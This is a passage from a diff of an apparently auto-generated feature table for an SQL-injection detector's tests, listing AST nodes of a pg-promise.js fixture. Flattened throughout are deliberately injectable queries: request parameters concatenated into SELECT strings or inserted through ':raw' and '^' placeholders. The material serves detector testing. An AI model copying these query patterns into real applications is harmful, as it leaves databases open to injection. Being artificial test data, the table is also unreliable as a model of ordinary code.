* FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:6:51:8 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:6:51:8 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | calleeImports | pg-promise | @@ -3808,6 +18577,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:51:10:58:3 | {\\n t ... }\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:8 | text | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:8 | text | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:8 | text | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:8 | text | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:8 | text | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:5:52:121 | text: " ... lue%\\"" | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | InputAccessPathFromCallee | 0.text | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | InputArgumentIndex | 0 | @@ -3818,6 +18602,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:52:11:52:121 | "SELECT ... lue%\\"" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:53:10 | values | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:53:10 | values | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:53:10 | values | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:53:10 | values | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:53:10 | values | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:5:57:5 | values: ... e\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | InputAccessPathFromCallee | 0.values | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | InputArgumentIndex | 0 | @@ -3828,6 +18627,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:53:13:57:5 | {\\n ... e\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:8 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:8 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:8 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:8 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:8 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:7:54:23 | id: req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:13 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:13 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:13 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:13 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:13 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:20 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:20 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:20 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:20 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:20 | req.params | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | CalleeFlexibleAccessPath | db.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | InputAccessPathFromCallee | 0.values.id | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | InputArgumentIndex | 0 | @@ -3838,6 +18662,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:11:54:23 | req.params.id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:15:54:20 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:15:54:20 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:15:54:20 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:15:54:20 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:15:54:20 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:22:54:23 | id | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:22:54:23 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:22:54:23 | id | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:22:54:23 | id | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:54:22:54:23 | id | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:10 | name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:10 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:10 | name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:10 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:10 | name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:7:55:27 | name: r ... ms.name | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:15 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:15 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name 